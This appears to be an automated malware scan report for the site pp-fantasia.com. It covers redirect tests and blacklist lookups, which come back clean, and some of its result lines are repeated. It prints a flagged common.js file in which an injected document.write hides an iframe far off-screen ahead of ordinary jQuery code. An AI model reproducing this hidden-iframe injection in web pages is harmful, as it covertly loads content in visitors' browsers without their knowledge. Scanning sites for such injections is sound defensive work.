Scanned pages/files
Request | Server response | Status |
http://pp-fantasia.com/js/common.js | 200 OK Content-Length: 650 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) document.write('<style>.bntrr3 { position:absolute; left:-1366px; top:-1494px} </style> <div class="bntrr3"><iframe src="http://google.com" width="305" height="552"></iframe></div>');$(document).ready(function(){ $('#menu dt').click(function(){ var menu=$(this).next(); if(menu.css('display')=='none'){ $(this).addClass('open'); }else{ $(this).removeClass('open'); } $(this).next().slideToggle('fast'); }); $('#find_form').submit(function(){ var findText=$('input[type="text"]',this); if(findText.length && findText.val()){ location.href='/index/find/'+encodeURIComponent(findText.val())+'/'; } return false; }); }); Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pp-fantasia.com
Result:
GET / HTTP/1.1
Host: pp-fantasia.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: pp-fantasia.com
Referer: http://www.google.com/search?q=pp-fantasia.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pp-fantasia.com
Referer: http://www.google.com/search?q=pp-fantasia.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pp-fantasia.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://pp-fantasia.com/
Result: pp-fantasia.com is not infected or malware details are not published yet.
Result: pp-fantasia.com is not infected or malware details are not published yet.